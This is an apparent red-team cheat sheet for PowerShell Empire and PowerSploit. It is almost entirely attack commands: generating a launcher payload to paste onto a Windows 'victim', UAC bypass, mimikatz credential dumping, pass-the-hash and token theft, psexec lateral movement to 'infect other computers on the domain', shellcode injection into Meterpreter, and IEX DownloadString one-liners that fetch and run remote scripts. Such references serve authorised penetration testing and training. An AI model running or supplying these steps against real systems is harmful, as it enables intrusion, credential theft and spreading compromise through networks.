

Resources

Official Site -
<http://www.powershellempire.com>
 Indepth Tutorial + Word Excel
 Macro Example -
<https://www.youtube.com/watch?v=aDeJB6eqps>
 ~39:30 - BSides DC 2015 -
 Bridging the Gap: Lessons in
 Adversarial Tradecraft
<https://www.youtube.com/watch?v=xHkRhRo3l8o>
 Offensive Active Directory with
 Powershell
<https://www.youtube.com/watch?v=cXWtu-qalSs>

Installation

```
git clone
https://github.com/powershell-empire/empire
sudo apt-get install
python-pip python-openssl
cd empire
cd setup
sudo ./install.sh
```

Execution & Exploitation

Create listener and generate Base64 cmd payload

```
sudo ./empire
listeners
set Name listenername
execute
usestager launcher
listenername
execute (generate payload, copy
& paste into cmd on Windows
victim)
agents
```

Execution & Exploitation (cont)

Note: Type in usestager then
 hit TAB twice for more options.

Post Exploitation

```
agents
interact AGENTNAME
sysinfo
usemodule
situational_awareness/netw
ork/arp scan
set Range
10.0.0.0-10.0.0.255
execute
...
usemodule
situational_awareness/netw
ork/reverse_dns
set Range
10.0.0.0-10.0.0.255
execute
...
usemodule
situational_awareness/netw
ork/powerview/user_hunter
execute
...
usemodule
situational_awareness/netw
ork/powerview/share_finder
set CheckShareAccess True
execute
...
agents
interact AGENTNAME
bypassuac LISTENERNAME
y
...wait for agent now active to
appear...
```

Post Exploitation (cont)

```
agents (look for a user with * as
this indicates admin)
interact AGENTNAME
mimikatz (collect creds, etc...)
creds
dir \\COMPUTERNAME\C$
creds
pth 1 (passthehash using cred 1,
a PID will be created)
steal_token PIDNUM
dir \\COMPUTERNAME\C$
```

Lateral Movement

```
usemodule
situational_awareness/netw
ork/powerview/find_localad
min_access
info
execute (computer-names
vulnerable to psexec will appear)
usemodule
lateral_movement/invoke_ps
exec
info
set Listener test1
set ComputerName
WIN10COMP.blah.com
(machine to attack)
info
execute
You can repeat the above process
to infect other computers on the
domain.
```

Connect to a Meterpreter Multi-Handler

Start your meterpreter multi
 handler, then do the following:
 interact NAME (target name from
 the 'agents' menu)
 usemodule
 code_execution/invoke_shel
 lcode
 info
 set lhost IPADDRESS (the IP in
 your multi-handler session)
 set lport PORT (the port in your
 multi-handler session)
 execute (wait...)
 (a meterpreter session will appear in
 metasploit)

Powersploit

Source -
<https://github.com/PowerShellMafia/PowerSploit/>
Demos
 User Hunting -
<https://www.sixdub.net/?p=591>
 Reverse meterpreter shell - DLL
 Injection using PowerSploit and
 Metasploit
<https://www.youtube.com/watch?v=yKoD5Oy8CKQ>
 PowerShell Toolkit: PowerSploit -
 Gaining Shells Without Writing To
 Disk
<https://www.youtube.com/watch?v=LEll6qa-REY>

Powersploit Example

```
cmd
powershell
IEX (New-Object
Net.WebClient).DownloadString("https://github.com/
PowerShellMafia/PowerSploit/raw/master/CodeExecut
ion/Invoke-Shellcode.ps1")
```

Powersploit Priv Esc

```
cmd
powershell
IEX (New-Object
Net.WebClient).DownloadString("https://raw.githubu
sercontent.com/PowerShellMafia/PowerSploit/master
/Privesc/PowerUp.ps1")
IEX (New-Object
Net.WebClient).DownloadString("https://raw.githubu
sercontent.com/PowerShellMafia/PowerSploit/master
/Privesc/Privesc.ps1")
Invoke-AllChecks
```



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